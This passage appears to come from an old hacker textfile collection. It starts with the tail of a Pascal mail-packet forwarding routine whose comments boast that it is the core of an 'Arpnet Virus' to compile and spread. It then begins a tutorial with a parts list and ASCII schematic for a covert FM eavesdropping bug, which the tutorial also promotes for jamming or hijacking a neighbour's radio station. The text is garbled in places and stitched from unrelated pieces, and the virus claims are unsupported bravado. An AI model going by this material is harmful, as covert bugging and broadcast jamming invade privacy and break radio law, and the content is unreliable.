  5088.         END  _7+3 _      END;
  5089.    UNTIL t1 <= 0;
  5090.    GOTOXY(2,4);
  5091.    CLREOL;
  5092.    CLOSE(mesg_dir);
  5093.    ASSIGN(email_dir,default.email_drive + email_file_dir);
  5094.    {$I-} RESET(email_dir); {$I+}
  5095.    IF IOresult <> 0 THEN
  5096.       BEGIN
  5097.      WRITELN(log_file,'I can''t open the email directory!');
  5098.      writest('I can''t open the email directory!',2,4);
  5099.      EXIT
  5100.       END;
  5101. {-------------CAUGHT SO WHAT DO YOU DO...DOESN'T MATTER DOES IT?--------}
  5102.    WHILE NOT EOF(email_dir) DO BEGIN
  5103.       READ(email_dir,email);
  5104.       IF test_bit(email_bit,FILEPOS(email_dir) - 1) AND
  5105.      bit(email.attrib,0) AND NOT bit(email.attrib,5) THEN
  5106.      BEGIN
  5107.         more := FALSE;
  5108.         fwd := TRUE;
  5109.         get_route_info(email.dest_net,email.dest_node,new_net,new_node,fwd,more);
  5110.         get_node_info(new_net,new_node,destnode);
  5111.         IF (new_net <> 0) OR (new_node <> 0) THEN
  5112.            BEGIN
  5113.           read_for_edit(default.email_drive + email_msg_dir,
  5114.                 email.msg_link,mesg_text);
  5115.           writest('Packet to Net/Node: ',2,4);
  5116.           WRITE(new_net,'/',new_node,' ',destnode.serial_num,'   ');
  5117.           writest('Name:  ' + email.dest_name,2,5);
  5118.           CLREOL;
  5119.           mesg.orig_node := email.org_node;
  5120.           mesg.orig_net := email.org_net;
  5121.           mesg.dest_node := email.dest_node;
  5122.           mesg.dest_net := email.dest_net;
  5123.           mesg.flags := email.attrib;
  5124.           mesg.dest_user := email.dest_name;
  5125.           mesg.org_user := email.org_name;
  5126.           mesg.title := '|/<Email>\|';
  5127.           construct_packet(new_net,new_node)
  5128.            END;
  5129.         email.attrib := email.attrib OR $0020;
  5130.         SEEK(email_dir,FILEPOS(email_dir) - 1);
  5131.         WRITE(email_dir,email)
  5132.      END
  5133.    END;
  5134.    CLOSE(email_dir);
  5135.    WRITELN;
  5136.    CLREOL;
  5137. {---------PUNISHMENT I WANT TO KNOW WHERE IT GOES BETTER LEFT OUT------}
  5138.    writest('Packets constructed: ' + strval(msg_counter),7,7);
  5139.    IF paramstr(1) = '' THEN
  5140.       BEGIN
  5141.      writest('Press any key to continue',6,8);
  5142.      hidecursor;  _7+3 _         ch := readkey;
  5143.      IF ch = #0 THEN
  5144.         ch := readkey;
  5145.      showcursor
  5146.       END;
  5147.    closewindow(4);
  5148.    WRITELN(log_file,'Done making the packets. Constructed: ',msg_counter)
  5149. END;
  5150. {---RIGHT LOOKS GOOD AND USEFULL  COMPILE AND REPRODUCE AND REPRODUCE----}
  5151. END.
  5152. {Above code: Is a GMPFU@C, Gone Made from UnderGrad @ College -Program 87}
  5153. {->Arpnet Virus:attachments must be modified,take out the write statements for}
  5154. {better effect and code speed, this is the root of the virus without any }
  5155. {destructive tendencies......hehehe}
  5156. {ShadowSpawn cc @wiskiesour@.988, ACTUALLY MY NAME THIS WEEK IS GEORGE BUSH}
  5157. {--------------------------------------------------------------------------}
  5158. {It gets better, wait till election Day!!!!!!!...better close your.........}
  5159.  
  5160.  
  5161.   
  5162. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                             %%                   <> How to make an FM wireless BUG <>                      %%                                                                             %%                         By: <-> Johnney Rotten <->                          %%                                                                             %%         <> A Cryptic Criminals/Elite Justice Society presentation <>        %%                                                                             %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%What it is----------This handy little device can be used for two purposes. The first is a FM bug,which transmits on the FM frequency, thus making it extremely easy to pick up.The second is a FM station blocker (which can be really fun if you are pissedat someone who just happens to be listening to the radio. In this case, you can do 1 (or both) of these: A) announce through the bug (on their station)that Fred (whoever is listening) has just won 1 years supply of orthopedicshoe pads, or B) disconnect the mike, and let it fry the station.) In thisfile, I will make some incredibly lame schematics, which any fool can follow,(lets see you make good schematics with Apple Writer), and tell you all thejunk you need (duh..) Ok, if you have no electronics background at all, goahead and try it anyways (hell, it's not my money your wasting on parts)   Required Parts--------------(1) 2n3904 transistor............................[Q1](1) 10k resistor (+-5%)..........................[R1](1) 4.7k resistor (+-5%).........................[R2](1) 1k resistor (+-5%)...........................[R3](1) .001 uf capacitor............................[C1](1) 5 to 80 pf variable capacitor................[C2](1) 10 pf capacitor..............................[C3](2) .5 uh coils..................................[L1,L2](1) SpSt slide switch............................[S1](1) 9 volt battery clip..........................[B1](1) Antenna or antenna wire (3 in. or more)......[A1](1) microphone (like one out of a phone).........[M1]Schematics----------          --------------*-------------*-------------*-------------*          |             |             |             |             |          |             |             |             |             |   +A1          |             |             |             |             L1  |          S1            R1            |             C2            |   |          |             |             |             |             *----          |             |             |             |             |          +             |             |             |             L2          B1            |             |             |             |           -             |             C1            |      
  5163.